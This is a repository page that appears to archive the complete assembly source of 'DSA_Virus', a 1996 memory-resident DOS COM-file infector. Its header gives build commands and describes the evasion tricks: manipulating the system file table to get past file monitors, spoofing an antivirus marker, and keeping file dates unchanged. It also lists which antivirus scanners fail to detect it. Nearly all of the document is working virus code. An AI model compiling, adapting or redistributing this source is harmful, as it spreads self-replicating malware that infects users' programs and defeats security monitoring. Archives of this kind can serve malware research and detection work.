forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DSA.ASM
executable file
·224 lines (188 loc) · 9.01 KB
/
DSA.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
;=====( DSA_Virus by Rajaat )==================================================
;
; Memory resident appending COM infector, residing in the stack space reserved
; for the DOS AH < 0ch calls. Works through TBFILE using SFT manipulation,
; obtained through the DSA. File date/time won't be altered and the virus can
; circumvent attributes. The virus is, compiled with TASM, a mere 263 bytes
; long.
;
;==============================================================================
;
; Virus name : DSA_Virus
; Author : Rajaat
; Origin : United Kingdom, July 1996
; Compiling : Using TASM
;
; TASM /M DSAVIRUS
; TLINK /T DSAVIRUS
; Targets : COM files
; Size : 263 bytes
; Resident : Yes, no decrease in memory reported
; Polymorphic : No
; Encrypted : No
; Stealth : Memory only, by utilizing dos stack space
; Tunneling : Uses SFT to avoid some monitors
; Retrovirus : Yes, uses TbSpoof
; Antiheuristics: Yes
; Peculiarities : Makes extensive use of the Dos Swappable Area (DSA)
; Drawbacks : Might crash, I'm not sure :)
; Behaviour : The first time the DSA virus is executed, it will check if
; it's already resident in memory by looking at the first byte
; in the DOS stack, located in the DSA. If this resembles a
; mov bp,xxxx instruction, it's already resident and the DSA
; virus will return control to the host program. If not, the
; virus will install itself in the DOS stack area, reserved for
; DOS INT 21 functions below 0ch. It will hook INT 21. If a
; program is executed while the DSA virus is resident, it will
; open it in read-only mode. Then it will use the DSA to locate
; the current SFT. In the SFT it modifies the read-only mode to
; read/write, effectively passing the file checks of TBFILE. It
; will also clear the file attributes during the infection
; process by using the SFT. The DSA virus will read the first
; 5 bytes of the file and checks wether the file is already
; infected or if it is an EXE file. If both checks are passed
; successfully, it will write itself at the end of the file
; and patches the start of the COM file to point at its code.
; The infected file increases by 263 bytes. Before closing the
; file, the DSA virus sets the file date/time update flag, so
; the date won't change after infection. After infection it
; will set the file attribute again and return control to it's
; caller.
;
; It's unknown what this virus might do besides replicate :)
;==============================================================================
;
; Results with antivirus software
;
; TBFILE - Doesn't detect it
; TBSCAN - Doesn't detect it
; TBMEM - Detects it
; TBCLEAN - Cleans it, so what?
; SVS - Detects it
; SSC - Doesn't detect it
; F-PROT - Doesn't detect it
; F-PROT /ANALYSE - Doesn't detect it
; F-PROT /ANALYSE /PARANOID - Doesn't detect it
; AVP - Detects it
; VSAFE - Corrupts infected files on my system!
; NEMESIS - I don't try this one anymore
;
;==============================================================================
.model tiny
.code
.radix 16
.286 ; why bother with XT?
org 100
DSA_Virus: mov bp,0 ; delta offset
Relative_Offset equ $-2
mov ax,5d06 ; get DSA pointer
int 21 ;
cmp byte ptr [si+600],0bdh ; mov bp in stack memory?
jne Install_TSR ; no, install virus
;=====( Return to host )=======================================================
Return_to_host: push cs cs ; move 5 bytes to offset 100h
pop ds es ; and execute host
lea si,COM_Host[bp]
pop ax
mov di,0ff
stosb
push di
movsw
movsw
movsb
ret
;=====( Install virus in memory )==============================================
Install_TSR: xchg ax,si
test al,0f ; DSA at paragraph boundary?
jnz Return_to_host ; no, abort
add ah,5 ; DSA+600 = DOS stack for
shr ax,4 ; ah < 0ch, virus re-aligns
mov bx,ds ; segment, so offset is
add ax,bx ; 100, like in COM files
push cs
pop ds
mov es,ax
lea si,DSA_Virus[bp]
mov di,100
mov cx,Virus_Length
Move_Virus: lodsb
stosb
loop Move_Virus ; move virus to stack space
push es
pop ds
mov ax,4521 ; get int 21
sub ah,10
int 21
mov word ptr INT_21,bx
mov word ptr INT_21+2,es
mov ah,25 ; set int 21
lea dx,New_21
int 21
jmp Return_to_host ; restore host
;=====( Data to place at the start of a COM file )=============================
Signature db '[DSA by Rajaat / Genesis]'
Virus_Jump: db 'PK' ; TbSpoof
db 0e9 ; jump to virus
;=====( First 5 bytes of host data )===========================================
COM_Host db 0cdh,020h,0,0,0
;=====( Resident INT 21 handler )==============================================
New_21: not ax
cmp ax,not 4b00 ; execute file?
not ax
jne Int_21_Done ; no, abort
Check_Infect: push ax bx dx ds es
mov ah,3dh ; open read-only
int 21
xchg ax,bx
mov ax,5d06 ; get DSA
int 21
lds si,dword ptr ds:[si+27e] ; get current SFT
push si ds
mov word ptr [si+2],2 ; open mode is now read/write
mov al,byte ptr [si+4] ; get file attribute
mov byte ptr [si+4],0 ; clear file attribute
push ax ; push file attribute on stack
push cs
pop ds
mov ah,3f ; read first 5 bytes of host
mov cx,5
lea dx,COM_Host
int 21
mov ax,word ptr [Com_Host]
sub ax,'KP' ; PK signature?
jz is_infected ; yes, abort
sub ax,'ZM'-'KP' ; MZ signature (EXE file)
jz is_infected ; yes, abort
mov ax,4202 ; goto end of file
xor cx,cx
cwd
int 21
mov word ptr Relative_Offset,ax ; store relative offset
push ax
mov ah,1 ; write virus at end of file
shl ah,6
mov cx,Virus_Length
lea dx,DSA_Virus
int 21
mov ax,4200 ; goto start of file
xor cx,cx
cwd
int 21
pop ax ; calculate jump address
mov cx,5
sub ax,cx
mov word ptr Com_Host,ax
mov ah,40 ; write jump at start of file
lea dx,Virus_Jump
int 21
Is_Infected: pop ax ds si
mov byte ptr [si+4],al ; restore file attributes
or byte ptr [si+6],40 ; don't change file date/time
mov ah,3e ; close file
int 21
pop es ds dx bx ax
Int_21_Done: db 0ea ; chain to old int 21
Virus_Length equ $-DSA_Virus
;=====( Data used by the virus, but not written to files )=====================
INT_21 dd 0
end DSA_Virus